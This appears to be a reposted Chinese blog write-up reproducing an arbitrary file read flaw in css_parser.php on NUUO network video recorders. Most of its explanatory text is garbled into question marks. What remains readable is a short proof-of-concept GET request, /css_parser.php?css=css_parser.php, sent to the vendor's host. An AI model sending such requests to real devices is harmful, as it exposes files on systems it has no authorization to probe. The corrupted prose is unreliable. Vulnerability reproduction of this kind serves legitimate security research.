NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现-白红宇

NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现

阅读量：800 次

发布时间：2023-02-17

本文共 764 字，大约阅读时间需要 2 分钟。

0x01 NUUO???????????

NUUO????????Network Video Recorder???NVR??NUUO Inc.???????????????????????????????????????????????????????IP????????????????????????????????????NUUO NVR??????????????????????????

0x02 ????

???????????????????css_parser.php???????????????????????????????????????????????????????????????????????????????????

0x03 ??????

????????????????

????????URL??GET?????????

GET /css_parser.php?css=css_parser.php HTTP/1.1

??????????????????User-Agent??????

Host: www.nuuo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:xx.xx.xx) Gecko/20100101 Firefox/xx.xx

0x04 ????

?????????PoC?Proof of Concept?????????????

GET /css_parser.php?css=css_parser.php HTTP/1.1  Host: www.nuuo.com

??????????css_parser.php???????????????????????????????????????

转载地址：http://hwnfk.baihongyu.com/

你可能感兴趣的文章

Opencv——模块介绍

查看>>

OpenCV与AI深度学习 | 2024年AI初学者需要掌握的热门技能有哪些？

查看>>

OpenCV与AI深度学习 | CIB-SE-YOLOv8: 优化的YOLOv8, 用于施工现场的安全设备实时检测 !

查看>>

OpenCV与AI深度学习 | CoTracker3：用于卓越点跟踪的最新 AI 模型

查看>>

OpenCV与AI深度学习 | OpenCV中八种不同的目标追踪算法

查看>>

OpenCV与AI深度学习 | OpenCV图像拼接--Stitching detailed使用与参数介绍

查看>>

OpenCV与AI深度学习 | OpenCV如何读取仪表中的指针刻度

查看>>

OpenCV与AI深度学习 | OpenCV常用图像拼接方法(一) ：直接拼接

查看>>

OpenCV与AI深度学习 | OpenCV常用图像拼接方法(三)：基于特征匹配拼接

查看>>

OpenCV与AI深度学习 | OpenCV常用图像拼接方法(二) ：基于模板匹配拼接

查看>>

OpenCV与AI深度学习 | OpenCV常用图像拼接方法(四)：基于Stitcher类拼接

查看>>

OpenCV与AI深度学习 | OpenCV快速傅里叶变换(FFT)用于图像和视频流的模糊检测（建议收藏！）

查看>>

OpenCV与AI深度学习 | PaddleOCR 2.9 发布，正式开源文本图像智能分析利器

查看>>

OpenCV与AI深度学习 | SAM2（Segment Anything Model 2）新一代分割一切大模型介绍与使用（步骤 + 代码）

查看>>

OpenCV与AI深度学习 | T-Rex Label ！超震撼 AI 自动标注工具，开箱即用、检测一切

查看>>

OpenCV与AI深度学习 | YOLO11介绍及五大任务推理演示(目标检测，图像分割，图像分类，姿态检测，带方向目标检测)

查看>>

OpenCV与AI深度学习 | YOLOv10在PyTorch和OpenVINO中推理对比

查看>>

OpenCV与AI深度学习 | YOLOv11来了：将重新定义AI的可能性

查看>>

OpenCV与AI深度学习 | YOLOv8自定义数据集训练实现火焰和烟雾检测（代码+数据集！）

查看>>

OpenCV与AI深度学习 | YOLOv8重磅升级，新增旋转目标检测，又该学习了！

查看>>